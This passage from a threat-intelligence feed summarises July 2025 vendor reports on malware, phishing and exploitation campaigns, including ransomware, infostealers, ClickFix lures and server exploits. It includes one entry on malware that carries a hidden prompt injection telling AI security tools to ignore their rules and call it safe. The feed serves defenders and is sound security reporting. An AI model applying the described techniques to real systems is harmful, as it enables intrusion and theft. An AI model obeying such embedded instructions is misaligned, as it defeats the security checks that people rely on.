Threat Research Feed

2025-07-17
Belarus_Linked_CHM_Downloader_Targeting_Poland
MEDIUM
Intel Source:
Dmpdump
Intel Name:
Belarus_Linked_CHM_Downloader_Targeting_Poland
Date of Scan:
2025-07-17
Impact:
MEDIUM
Summary:
Researchers from dmpdump have observed a malicious HTML Help file exploiting Windows HTML Help to deploy a multi-stage downloader. Delivered as a fake bank transfer notification on June 30, 2025, the CHM triggers obfuscated script that leverages an ActiveX control to extract a staged loader from a CAB container. That loader uses XOR-based decryption and native HTTP APIs to fetch a concealed payload embedded in an image hosted on a remote server, then decrypts and executes it. The final payload establishes persistence by registering a scheduled task via COM. UNC1151 (FrostyNeighbor), a Belarus-linked actor, likely aims to maintain stealthy long-term access. The campaign’s living-off-the-land techniques and banking-themed lure illustrate advanced evasion.
Source: https://dmpdump.github.io/posts/Belarus-nexus_Threat_Actor_Target_Poland/
2025-07-17
Rainbow_Hyena_Phishing_Alert
HIGH
Intel Source:
BI.ZONE
Intel Name:
Rainbow_Hyena_Phishing_Alert
Date of Scan:
2025-07-17
Impact:
HIGH
Summary:
Researchers at BI.ZONE have identified that Rainbow Hyena launched a late-June phishing campaign targeting Russian healthcare and IT organizations, delivering ZIP-based polyglot attachments that conceal a decoy document and an LNK dropper to deploy the custom PhantomRemote backdoor. The operation used compromised sender addresses and recognizable branding to evade email filters and trick recipients into executing the payload. PhantomRemote launches via rundll32.exe and cmd.exe, harvests system identifiers (GUID, computer name, domain), and establishes HTTP-based C2 channels to download additional executables and exfiltrate command results. It creates persistent directories under %PROGRAMDATA% (YandexCloud or MicrosoftAppStore) for payload staging. Hidden PowerShell execution, binary obfuscation through polyglot files, and direct IP-based C2 demonstrate advanced evasion and access capabilities.
Source: https://bi.zone/eng/expertise/blog/rainbow-hyena-snova-atakuet-novyy-bekdor-i-smena-taktik/
2025-07-16
Octalyn_Stealer
LOW
Intel Source:
Cyfirma
Intel Name:
Octalyn_Stealer
Date of Scan:
2025-07-16
Impact:
LOW
Summary:
Cyfirma researchers have discovered a new malware called Octalyn Stealer, which is designed to steal sensitive data from Windows systems. It is built in C++ and comes with a Delphi-based builder tool, allowing low-skilled attackers to create custom malware using a Telegram bot token and chat ID. Once executed, it silently steals browser passwords, cookies, Discord and Telegram tokens, VPN settings, gaming account info, and cryptocurrency wallet data. The malware achieves persistence by modifying the Startup folder and a Windows registry key to run automatically at system startup. It can also deliver additional malicious files using hidden PowerShell scripts. The stolen data is saved in a temporary folder named Octalyn, zipped into an archive, and then exfiltrated to the attacker via the Telegram API.
Source: https://www.cyfirma.com/research/octalyn-stealer-unmasked/
2025-07-16
Multi_Stage_Phishing_via_Reservation_Portals
MEDIUM
Intel Source:
Google Threat Intelligence
Intel Name:
Multi_Stage_Phishing_via_Reservation_Portals
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
Researchers at Google Threat Intelligence have uncovered a large-scale phishing operation exploiting legitimate reservation messaging channels to harvest payment credentials and personal data. The campaign employed a multi-stage infrastructure, with Tier 1 redirectors registered to domains mimicking genuine hotel confirmations and Tier 2 hosts serving fraudulent booking sites. Activity accelerated from January 2025, peaking in May and June, and was observed through both in-app chat threads and authentic-looking emails. Actors leveraged automated domain registration and meta-tag analysis to expand their infrastructure, then delivered victims a malicious archive containing logs of stolen guest booking details.
Source: https://www.googlecloudcommunity.com/gc/Community-Blog/Actionable-threat-hunting-with-GTI-II-Analyzing-a-massive/ba-p/923129?linkId=15662116
2025-07-16
Dark_101_Ransomware
MEDIUM
Intel Source:
Fortinet
Intel Name:
Dark_101_Ransomware
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
FortiGuard researchers have discovered a new ransomware called Dark 101, built on the .NET framework. It uses environmental checks and time-based delays to evade sandbox analysis. Once on a system, it hides by copying itself to the %AppData% folder under the name svchost.exe, mimicking a legitimate Windows system process. It then executes several commands such as vssadmin, wmic, and wbadmin to delete Volume Shadow Copies and the Windows Backup catalog. Additionally, it disables Task Manager by modifying system registry settings to prevent users from closing it manually. The malware scans for files with specific extensions, encrypts them, appends a random four-letter extension to the filenames and drops a read_it.txt ransom note demanding payment in Bitcoin. As a result, victims are left without easy recovery options and face significant operational disruption and potential financial loss.
Source: https://www.fortinet.com/blog/threat-research/fortisandbox-detects-dark-101-ransomware-despite-evasion-techniques
2025-07-16
GLOBAL_GROUP_RaaS_Operator
MEDIUM
Intel Source:
EclecticIQ
Intel Name:
GLOBAL_GROUP_RaaS_Operator
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
EclecticIQ researchers have uncovered a new ransomware-as-a-service (RaaS) group dubbed GLOBAL_GROUP, operated by the threat actor “$$$”. This group offers an 85% share of ransom payments, along with user-friendly features like a mobile-accessible control panel and an AI-driven negotiation system. Their affiliates gain initial network access through brokers and brute-force tools to deploy customized ransomware capable of encrypting data across Windows, Linux, macOS, and VMware ESXi hosts. Once inside, affiliates communicate with victims through encrypted Tor-based sites to demand ransom and leverage AI-powered chatbots to engage victims during ransom negotiations, aiming to increase psychological pressure. So far, their attacks have impacted organizations in sectors like healthcare, oil-and-gas, industrial manufacturing, automotive services, and outsourcing, with victims located in countries including the U.S., U.K., Australia, and Brazil.
Source: https://blog.eclecticiq.com/global-group-emerging-ransomware-as-a-service
2025-07-15
A_Hybrid_Approach_of_BlackSuit_Ransomware
MEDIUM
Intel Source:
Cybereason
Intel Name:
A_Hybrid_Approach_of_BlackSuit_Ransomware
Date of Scan:
2025-07-15
Impact:
MEDIUM
Summary:
Researchers from Cybereason have uncovered a ransomware group known as BlackSuit that emerged in mid-2023 and is believed to be a successor to the Royal ransomware group. The group operates organized, multi-stage attacks involving both data exfiltration and file encryption. The attackers leverage Cobalt Strike Beacon for C2, deploy payloads through PowerShell commands, and disguise legitimate tools like rclone.exe to evade detection. They move laterally across the network using tools like PsExec, RPC, and RDP, even adding fake administrator accounts to gain wider access. The attackers also steal credentials from LSASS for privilege escalation, exfiltrate around 60 GB of sensitive data to cloud-based servers, and demand a ransom of between $1 million and $10 million in Bitcoin.
Source: https://www.cybereason.com/blog/blacksuit-data-exfil
2025-07-12
Kimsuky_Deploys_VMP_Protected_HappyDoor_Backdoor
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Kimsuky_Deploys_VMP_Protected_HappyDoor_Backdoor
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
The 360 Threat Intelligence Center has identified a recent espionage campaign attributed to the North Korea-based APT group Kimsuky (APT-C-55), targeting entities in South Korea. The threat actor uses a trojanized installer for the legitimate Bandizip software as an initial access vector. Upon execution, the installer deploys the HappyDoor backdoor, a known Kimsuky tool, which has been newly upgraded with a VMProtect shell to significantly hinder analysis and evade detection. The multi-stage infection process also involves using mshta.exe to fetch remote VBScript payloads for reconnaissance and data exfiltration. The backdoor establishes persistence via scheduled tasks and is capable of keylogging, screen capture, and stealing files with specific extensions such as .hwp and .pdf.
Source: https://mp.weixin.qq.com/s/fDan8ihUQEAF5Kf_6fXATQ?
2025-07-12
Fake_CAPTCHA_Social_Engineering
LOW
Intel Source:
Linkedin
Intel Name:
Fake_CAPTCHA_Social_Engineering
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Shaquib Izhar’s analysis on LinkedIn revealed an emerging social engineering campaign that ensnares victims with a counterfeit CAPTCHA page mimicking a common web security check. Upon clicking “Verify,” the page silently copies PowerShell code to the clipboard and prompts users to launch the Windows Run dialog, where it registers a webhook to monitor execution. The payload chain then delivers a secondary PowerShell loader and a batch script designed to detect and bypass virtualized environments before unleashing additional malware on standard Windows systems.
Source: https://www.linkedin.com/posts/shaquib-izhar_a-very-cool-fake-captcha-social-engineering-activity-7346678407419613184-B0-Y/?utm_source=social_share_send&utm_medium=member_desktop_web&rcm=ACoAABO-jCkB1he5ufTfbYYMNKmaojg8M31OVpM
2025-07-12
Malicious_Inno_Setup_Loader_Deploys_RedLine_Stealer
LOW
Intel Source:
Splunk
Intel Name:
Malicious_Inno_Setup_Loader_Deploys_RedLine_Stealer
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Splunk researchers uncovered a new malware campaign that uses a fake software installer created with Inno Setup. This installer includes a Pascal script designed to detect and evade debugger and sandbox environments before retrieving and decrypting a multi-stage payload. The installer connects to a TinyURL link that redirects to a file-hosting site (rentry.org), where it downloads a password-protected ZIP file. Once extracted, the malware runs a loader that decrypts and executes a malicious DLL file, which then loads a secondary payload known as HijackLoader. It also creates a hidden scheduled task called lang that runs a disguised program every time the system restarts. In the final stage, the attack drops RedLine Stealer, which collects saved passwords, cookies, form-fill data, and crypto wallet keys from various browsers and extensions.
Source: https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html
2025-07-12
SLOW_TEMPEST_Malware_Obfuscation
MEDIUM
Intel Source:
unit42
Intel Name:
SLOW_TEMPEST_Malware_Obfuscation
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
According to Unit 42’s analysis, SLOW#TEMPEST employs advanced control-flow obfuscation and dynamic jump dispatchers within a loader DLL to impede static reverse-engineering. The actor delivers an ISO-based dropper that uses the Windows API GlobalMemoryStatusEx to verify system memory exceeds six gigabytes before unpacking the payload, an anti-sandbox measure. First documented in July 2025, this campaign targets Windows environments where indirect function calls and obfuscated API invocations thwart signature and static analysis.
Source: https://unit42.paloaltonetworks.com/slow-tempest-malware-obfuscation/
2025-07-12
Prompt_Injection_Malware
LOW
Intel Source:
Checkpoint
Intel Name:
Prompt_Injection_Malware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Check Point have discovered a new malware called Skynet that was anonymously uploaded from the Netherlands. Although the malware is still in an early stage and not fully functional, it tries to trick AI-based security systems by including a hidden prompt injection that instructs the AI to ignore its usual rules and incorrectly label the malware as safe. The malware also tries to evade detection using sandbox evasion, gathers basic system information and sets up a secure connection using the TOR network.
Source: https://research.checkpoint.com/2025/ai-evasion-prompt-injection/
2025-07-12
Rhadamanthys_Infostealer_ClickFix_CAPTCHA_Delivery
LOW
Intel Source:
Dark Atlas
Intel Name:
Rhadamanthys_Infostealer_ClickFix_CAPTCHA_Delivery
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Darkatlas have identified the Rhadamanthys infostealer campaign using a typosquatted ClickFix CAPTCHA domain to deliver a stealthy PowerShell launcher that executes in memory and retrieves a malicious MSI package, enabling a fileless dropper flow. That dropper fetches and executes PTRFHDGS.msi via msiexec.exe, masquerading as legitimate software and displaying a fake “Verification complete!” prompt to deceive users. The malware employs multiple anti-analysis checks—including virtualization and debugger detection, as well as time-based side-channel evasion—to hinder sandbox and manual analysis. Once active, Rhadamanthys’ modular architecture harvests a broad range of sensitive data—system identifiers, browser credentials, cryptocurrency wallets, screenshots, and application configurations—from Windows hosts.
Source: https://darkatlas.io/blog/clickfix-chaos-a-deep-dive-into-rhadamanthys-infostealers-stealth-and-steal-tactics
2025-07-12
Exploitation_Wing_FTP_Serve_Vulnerability
MEDIUM
Intel Source:
Huntress
Intel Name:
Exploitation_Wing_FTP_Serve_Vulnerability
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers from Huntress discovered that attackers were actively exploiting a vulnerability (CVE-2025-47812) in Wing FTP Server versions prior to 7.4.4. This flaw allows attackers to execute remote code on the system with full privileges. The attackers sent crafted requests to the server’s login page, injecting malicious Lua scripts that enabled them to run system commands like cmd.exe and certutil. Once inside, the attackers ran basic reconnaissance commands such as ipconfig and whoami, created two backdoor user accounts named wingftp and wing, and tried to install a remote access tool (ScreenConnect) along with a second-stage malware payload. However, this activity was flagged and blocked by Microsoft Defender as a Trojan named Ceprol.
Source: https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild
2025-07-12
Unauthorized_Proxy_Deployment_on_Linux_SSH
LOW
Intel Source:
ASEC
Intel Name:
Unauthorized_Proxy_Deployment_on_Linux_SSH
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at ASEC have identified a campaign in which attackers target Linux systems with weak SSH passwords. The attackers gain initial access through brute-force or dictionary attacks and then execute Bash scripts to install proxy software such as TinyProxy or Sing-box. For TinyProxy, they modify the configuration to allow unrestricted internet access and ensure the proxy starts automatically with the system. The Sing-box installation involves downloading and executing a one-click installation script from a public GitHub repository, enabling support for multiple proxy protocols including vmess-argo and TUICv5. These proxies can be leveraged to conceal further malicious activity or sold for illicit use.
Source: https://asec.ahnlab.com/ko/88669/
2025-07-12
RedDirection_Malicious_Browser_Extensions
MEDIUM
Intel Source:
Medium (Koi Security)
Intel Name:
RedDirection_Malicious_Browser_Extensions
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers at Koi Security have observed eighteen malicious Chrome and Edge extensions that hijacked browser sessions and exfiltrated every visited URL from over 2.3 million users. Delivered via innocuous version updates through official auto-update pipelines, the extensions injected background scripts that captured tab URLs and unique identifiers, relaying them to a centralized command-and-control infrastructure. The attackers exploited trust signals (verified publisher badges, featured placement and positive reviews) to evade marketplace vetting and persist undetected for years. Once activated, the malware periodically executed remote-instructed redirects to attacker-controlled sites, creating a persistent man-in-the-browser capability.
Source: https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5
2025-07-12
Defendnot_A_Silent_Windows_Defender_Disabler
MEDIUM
Intel Source:
Stairwell
Intel Name:
Defendnot_A_Silent_Windows_Defender_Disabler
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Stairwell researchers have highlighted a new tool called defendnot, developed by a user named es3n1n, which is designed to quietly disable Microsoft Defender. This tool leverages a sneaky technique: it registers itself as another antivirus program through the Windows Security Center (WSC) API, causing Defender to voluntarily disable itself. Although defendnot was initially released for red teaming, its design makes it useful for cybercriminals or nation-state actors. If attackers use this tool after compromising a system, they can run malware without being detected.
Source: https://stairwell.com/resources/detecting-defendnot-a-tool-for-silently-disabling-windows-defender/
2025-07-12
Oyster_Broomstick_Backdoor_via_SEO_Poisoning
MEDIUM
Intel Source:
Arcticwolf
Intel Name:
Oyster_Broomstick_Backdoor_via_SEO_Poisoning
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers from Arctic Wolf have observed a malvertising campaign leveraging search engine optimization poisoning to redirect IT professionals to trojanized installers of PuTTY and WinSCP. Embedded within legitimate packages, the Oyster and Broomstick backdoors grant stealthy remote-access footholds on on-premises administrative workstations. The campaign’s reliance on trusted binaries and absence of overt indicators complicates detection and response.
Source: https://arcticwolf.com/resources/blog/malvertising-campaign-delivers-oyster-broomstick-backdoor-via-seo-poisoning-trojanized-tools/
2025-07-12
M365_Direct_Send_Phishing_Campaign
MEDIUM
Intel Source:
Varonis
Intel Name:
M365_Direct_Send_Phishing_Campaign
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers at Varonis have uncovered a phishing campaign exploiting Microsoft 365’s Direct Send feature to trick organizations. Normally, Direct Send is used by internal devices to send emails within an organisation without requiring authentication. The attackers send phishing emails disguised as voicemail notifications. These emails contain PDF attachments with QR codes. When scanned, the QR codes redirect victims to deceptive websites designed to steal their login credentials. The phishing emails originate from an IP address located in Ukraine and bypass basic email security checks such as SPF, DKIM and DMARC; they are delivered because the Direct Send feature treats them as internal messages. The campaign began in May 2025 and has already targeted over 70 organizations in the U.S., spanning different industries.
Source: https://www.varonis.com/blog/direct-send-exploit
2025-07-12
CapCut_Phishing_Campaign_Targets_Apple_Users
LOW
Intel Source:
Cofense
Intel Name:
CapCut_Phishing_Campaign_Targets_Apple_Users
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Cofense researchers have uncovered a phishing campaign in which attackers create fake CapCut invoices to trick users and steal their Apple credentials and payment information. The attackers send a fake email claiming a $49.99 CapCut Pro charge via Apple, prompting users to cancel the subscription. When clicked, they’re taken to a deceptive Apple login page hosted on a non-Apple website, where their Apple ID credentials are stolen. The attack then escalates with a second phishing page requesting credit card details under the guise of processing a refund. The attackers even show a fake two-factor authentication screen designed to steal both login and payment details while keeping the victim engaged. If successful, it can lead to account takeovers, stolen money and identity theft.
Source: https://cofense.com/blog/capcut-con-apple-phishing-card-stealing-refund-ruse
2025-07-12
Supply_Chain_Attack_Targets_Ethereum_Developers
LOW
Intel Source:
Reversinglabs
Intel Name:
Supply_Chain_Attack_Targets_Ethereum_Developers
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
ReversingLabs researchers uncovered a supply chain attack involving a GitHub user named Airez299, who compromised the ETHcode extension for Visual Studio Code. The attacker submitted a pull request that added a malicious dependency called keythereum-utils, which leverages Node.js’s require function to execute obfuscated JavaScript that silently launched a hidden PowerShell process. This process then downloaded and ran a secondary payload from a public file-hosting site. The campaign targets Ethereum smart contract developers through the extension’s automatic update mechanism; the extension had reached roughly 6,000 installs.
Source: https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension
2025-07-12
Fake_SPID_Certificate_Renewal_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
Fake_SPID_Certificate_Renewal_Campaign
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
CERT-AGID researchers have observed a phishing campaign targeting SPID users. The campaign involves fraudulent emails with the subject “Your digital certificate has just been renewed”, prompting recipients to download a counterfeit digital certificate supposedly necessary for SPID access. Once clicked, recipients are redirected to a deceptive SPID login page that harvests credentials. The messages appear to come from noreply@spid.gov.it but are actually sent from third-party servers lacking DKIM signatures and exploiting SPF misconfigurations to evade detection. If credentials are compromised, attackers could hijack SPID sessions, enabling unauthorized access to sensitive government and private-sector information.
Source: https://cert-agid.gov.it/news/il-tema-spid-ancora-sfruttato-per-una-nuova-campagna-di-phishing/
2025-07-12
Lumma_Stealer_Deploys_Follow_up_Malware
LOW
Intel Source:
Malware Traffic
Intel Name:
Lumma_Stealer_Deploys_Follow_up_Malware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers from Malware-Traffic have identified a malware campaign distributing Lumma Stealer, which subsequently deploys a persistent backdoor. The initial infection vector is social engineering, luring victims with cracked "Turnitin" software promoted on a Facebook page as of June 26, 2025. The user downloads a password-protected archive containing a Nullsoft installer. Upon execution, the installer uses an obfuscated batch script and a legitimate AutoIt interpreter to run the Lumma Stealer payload, which exfiltrates data from the compromised Windows system. The stealer then downloads a secondary loader, which retrieves a penetration testing tool from GitHub and establishes persistence via a shortcut in the Windows Startup folder.
Source: https://www.malware-traffic-analysis.net/2025/06/26/index.html
2025-07-12
An_Investigation_of_Qilin_Ransomware
LOW
Intel Source:
Cyberint
Intel Name:
An_Investigation_of_Qilin_Ransomware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Cyberint have observed that Qilin operates as an affiliate ransomware-as-a-service program deploying Rust-based binaries via spearphishing links to deliver customized double extortion campaigns. The campaign first exfiltrates sensitive data through malicious links embedded in phishing emails and then encrypts critical files using configurable modes—skip-step, percent, or fast—to maximize impact. Operators terminate specific processes, inhibit system recovery, and reboot hosts to hinder remediation. Victim data from multiple industries and geographies is posted on a proprietary dark-web leak site, pressuring organizations to comply. Samples exist for Windows and ESXi platforms, with the Rust variant offering enhanced evasion and resistance to analysis. Large-scale exfiltration campaigns have stolen hundreds of gigabytes of financial and proprietary data, including 340 GB from a U.S. financial advisory firm on July 1, 2025.
Source: https://cyberint.com/blog/research/qilin-ransomware/
2025-07-11
GeoServer_CoinMiner_Exploit_Campaign
LOW
Intel Source:
ASEC
Intel Name:
GeoServer_CoinMiner_Exploit_Campaign
Date of Scan:
2025-07-11
Impact:
LOW
Summary:
Researchers at AhnLab Security Emergency Response Center have observed ongoing exploitation of unpatched GeoServer instances following the CVE-2024-36401 disclosure in 2024, allowing adversaries to execute remote code and deploy Monero mining payloads. These actors conduct automated scans for vulnerable GeoServer hosts and leverage the Java-based RCE to install NetCat for reverse-shell access and XMRig via platform-native scripts on both Windows and Linux systems.
Source: https://asec.ahnlab.com/en/88917/
2025-07-11
DoNotAPT
HIGH
Intel Source:
Trellix
Intel Name:
DoNotAPT
Date of Scan:
2025-07-11
Impact:
HIGH
Summary:
According to Trellix Advanced Research Center, the DoNot APT group conducted a multi-stage spear-phishing campaign against a Southern European foreign affairs ministry to facilitate long-term cyber espionage. The attackers impersonated defense officials in a crafted email with a Google Drive link, delivering a password-protected RAR archive that deployed a custom “LoptikMod” backdoor masquerading as a PDF. Once executed, the malware used binary-encoded obfuscation, dynamic API resolution, and scheduled tasks to achieve persistence. It gathered system details—including CPU model, OS build, username, hostname, and installed software—encrypted them with AES, and exfiltrated them via HTTPS POST to a malicious domain. Follow-on downloads of a DLL module (“socker.dll”) and additional scheduled tasks (“MicorsoftVelocity”) enabled further command and control. Primary targets were government and diplomatic organizations running Windows. The operation’s impact includes unauthorized access to sensitive diplomatic communications, exposure of MFA credentials, and sustained network compromise.
Source: https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/
2025-07-10
Pay2KeyI2P_Iranian_RaaS_Targets_the_West
HIGH
Intel Source:
Morphisec
Intel Name:
Pay2KeyI2P_Iranian_RaaS_Targets_the_West
Date of Scan:
2025-07-10
Impact:
HIGH
Summary:
Morphisec's researchers have uncovered the resurgence of Pay2Key, an Iranian-backed ransomware-as-a-service (RaaS) operation now operating as Pay2Key.I2P and linked to the Fox Kitten APT group. Active since February 2025, this financially and ideologically motivated campaign targets Western organizations, particularly those perceived as enemies of Iran, and has already amassed over $4 million in ransoms. The attack begins with a sophisticated, multi-stage 7-Zip SFX payload that uses a polyglot CMD and PowerShell script to execute a series of anti-analysis checks and defense evasion techniques, including disabling Microsoft Defender. The final payload is the Themida-protected Mimic ransomware. With the recent addition of a Linux variant and a lucrative 80% profit share for affiliates attacking ideological targets, the threat surface is expanding.
Source: https://www.morphisec.com/blog/pay2key-resurgence-iranian-cyber-warfare/
2025-07-10
LogoKit_Phishing_Campaign
LOW
Intel Source:
Cyble
Intel Name:
LogoKit_Phishing_Campaign
Date of Scan:
2025-07-10
Impact:
LOW
Summary:
Researchers at Cyble have uncovered an ongoing phishing campaign that leverages LogoKit, which is designed to steal login credentials by impersonating legitimate organizations. The threat actors are masquerading as entities such as HunCERT, Kina Bank, the Catholic Church, and logistics companies to deceive users into entering their credentials. These fraudulent pages are hosted on Amazon S3 and Render and appear legitimate by incorporating Cloudflare Turnstile (a CAPTCHA service) and automatically retrieving real logos from Clearbit and Google Favicon. Once a victim enters their credentials, the data is exfiltrated to a C2 server through an HTTP POST request. The stolen credentials can enable attackers to gain unauthorized access, carry out business email compromise (BEC), move laterally within networks, and potentially cause major data breaches.
Source: https://cyble.com/blog/logokit-being-leveraged-for-credential-theft/
2025-07-10
SilentRoute_Backdoor_Exfiltrates_Credentials
MEDIUM
Intel Source:
ESentire
Intel Name:
SilentRoute_Backdoor_Exfiltrates_Credentials
Date of Scan:
2025-07-10
Impact:
MEDIUM
Summary:
Researchers at eSentire uncovered a campaign in which threat actors created a fake version of SonicWall’s NetExtender VPN client by adding a hidden backdoor called SilentRoute. This campaign leverages an SEO poisoning tactic to lure remote-access users into downloading this malicious version from a legitimate-looking website that hosts a malicious installer named SonicWall-NetExtender.msi. Once installed, it captures login credentials, including domain, username, and password, which are then exfiltrated to an attacker-controlled server. The main objective of this campaign is to target corporate users of the SonicWall VPN client, allowing attackers to log in to organisation networks as legitimate users, move laterally and conduct additional malicious activities.
Source: https://www.esentire.com/blog/threat-actors-recompile-sonicwalls-netextender-to-include-silentroute-backdoor
2025-07-10
A_Deep_Dive_into_XWorm_Malware
MEDIUM
Intel Source:
Splunk
Intel Name:
A_Deep_Dive_into_XWorm_Malware
Date of Scan:
2025-07-10
Impact:
MEDIUM
Summary:
Researchers at Splunk have identified that XWorm employs a rotating arsenal of droppers, stagers, and payloads to evade detection and maintain persistent access on Windows endpoints. It leverages phishing lures impersonating invoices, shipping notices, or business requests to trick users into executing malicious attachments. XWorm is delivered in multiple formats such as .exe, .js, .vbs, .bat, .hta and .lnk, and it uses advanced evasion techniques such as AMSI bypass, ETW disablement, and registry-based Defender exclusions. It achieves persistence by creating registry keys, scheduled tasks, startup folder entries, DLL side-loading, and spreading via USB or other removable media. Once active, it performs discovery of AV products, video-capture drivers, and graphics card information before establishing HTTP-based C2 communications. The main objective of this malware is unauthorized data access, potential lateral movement, and long-term undetected system compromise.
Source: https://www.splunk.com/en_us/blog/security/xworm-shape-shifting-arsenal-detection-evasion.html
2025-07-09
Batavia_Malware_Targeting_Russia
LOW
Intel Source:
Securelist
Intel Name:
Batavia_Malware_Targeting_Russia
Date of Scan:
2025-07-09
Impact:
LOW
Summary:
Securelist researchers have discovered a new malware strain called Batavia that emerged in July 2024. This malware targets Russian industrial enterprises and is delivered through spear-phishing emails disguised as business contracts. When a victim clicks the malicious link, it downloads a VBScript downloader that decrypts and installs additional payloads. Two separate executable files, WebView.exe and javav.exe, are used to collect sensitive files such as Microsoft Office documents, system logs, and files from USB drives or other removable media. Additionally, Batavia takes screenshots of the victim's screen and computes file hashes to avoid uploading duplicate files. The malware communicates with its C2 server over HTTPS and obfuscates its payloads using XOR and Base64 encoding. To maintain persistence, it creates a shortcut in the Start Menu's startup folder, ensuring execution on each user login.
Source: https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/
2025-07-09
NordDragonScan_Target_Window_Systems
MEDIUM
Intel Source:
Fortinet
Intel Name:
NordDragonScan_Target_Window_Systems
Date of Scan:
2025-07-09
Impact:
MEDIUM
Summary:
Researchers at FortiGuard have discovered a new information-stealing malware called NordDragonScan, targeting Windows systems primarily in Ukraine’s government and energy sectors. The malware is distributed through shortened URLs and malicious shortcut files that execute a malicious HTA script, which installs a .NET-based payload. It leverages the legitimate PowerShell binary to download a hidden payload and installs a file named adblocker.exe inside a folder named NordDragonScan. Once installed, it collects system information, captures screenshots, steals files and PDFs from common directories, and extracts saved browser data from Chrome and Firefox. It also scans the local network to identify other reachable systems and exfiltrates all collected data to a remote server over HTTPS. Victims are lured with fake Ukrainian-language documents related to government and energy sector communications.
Source: https://www.fortinet.com/blog/threat-research/norddragonscan-quiet-data-harvester-on-windows
2025-07-09
XMRig_Global_Cryptomining_Campaign
LOW
Intel Source:
GData
Intel Name:
XMRig_Global_Cryptomining_Campaign
Date of Scan:
2025-07-09
Impact:
LOW
Summary:
Researchers at GDATA Security Lab have identified a global cryptomining campaign leveraging XMRig to mine Monero cryptocurrency that emerged in April 2025. The campaign begins with the execution of batch script files via svchost.exe, followed by PowerShell commands that download and execute additional payloads. The attackers create scheduled tasks to disable Windows Defender and automatic update services before deploying the XMRig miner under random names to evade detection. They use LOLBAS techniques and hidden PowerShell windows to ensure persistence, leading to degraded system performance, increased energy consumption, and disruption of system maintenance. The malware has been observed in multiple countries, indicating that it targets systems worldwide.
Source: https://www.gdatasoftware.com/blog/2025/07/38228-monero-malware-xmrig-resurgence
2025-07-08
NightEagle_Exploits_Exchange_for_Espionage
MEDIUM
Intel Source:
RedDrip7
Intel Name:
NightEagle_Exploits_Exchange_for_Espionage
Date of Scan:
2025-07-08
Impact:
MEDIUM
Summary:
Researchers at RedDrip7 have disclosed that the APT group NightEagle exploited a previously unknown Microsoft Exchange deserialization vulnerability to achieve remote code execution on targeted Exchange servers. The group’s operations appear to be strategically motivated, with a focus on exfiltrating sensitive email data from high-tech Chinese organizations. To establish internal network access, NightEagle deployed a modified Chisel reverse tunnel disguised as a legitimate Synology update service. This was followed by memory-only injection of a custom .NET loader delivered through virtual URL web shells. The implant enabled sustained, covert remote email harvesting and command execution while avoiding disk-based detection mechanisms.
Source: https://github.com/RedDrip7/NightEagle_Disclose/blob/main/Exclusive%20disclosure%20of%20the%20attack%20activities%20of%20the%20APT%20group%20NightEagle.pdf
2025-07-08
Tomcat_Partial_PUT_Camel_Header_Hijack
MEDIUM
Intel Source:
unit42
Intel Name:
Tomcat_Partial_PUT_Camel_Header_Hijack
Date of Scan:
2025-07-08
Impact:
MEDIUM
Summary:
During March 2025, Unit 42 observed a surge in attacks leveraging critical Apache vulnerabilities. CVE-2025-24813 permits remote deserialization via Tomcat’s standard partial PUT mechanism, and CVE-2025-27636 and CVE-2025-29891 abuse Camel’s header processing to execute arbitrary commands. Exploitation attempts exceeded 7,800 across more than 70 countries, confirming a global automated campaign. Attackers identify targets via session name enumeration and Content-Range manipulation before delivering payloads that result in remote code execution.
Source: https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/
2025-07-07
Datacarry_Ransomware_Campaign
MEDIUM
Intel Source:
CCITIC
Intel Name:
Datacarry_Ransomware_Campaign
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
The Cyber Counter-Intelligence Threat Investigation Consortium (CCITIC) has identified a targeted campaign by the Datacarry ransomware group, active since June 2024 and significantly intensifying in spring 2025. The group exploits a critical vulnerability in Fortinet EMS (CVE-2023-48788) to gain initial access. Following exploitation, they use PowerShell to configure the environment for deploying a Go-based implant, which enables persistent command-and-control communication via the Chisel tunneling tool over WebSockets. The actors exfiltrate large volumes of data before deploying a Conti-variant ransomware payload.
Source: https://www.ccitic.org/assets/reports/CCITIC_Report_TLP-White_DATACARRY.pdf
2025-07-07
APT36_Targets_Indian_Defence_Via_BOSS_Linux_Systems
MEDIUM
Intel Source:
Cyfirma
Intel Name:
APT36_Targets_Indian_Defence_Via_BOSS_Linux_Systems
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
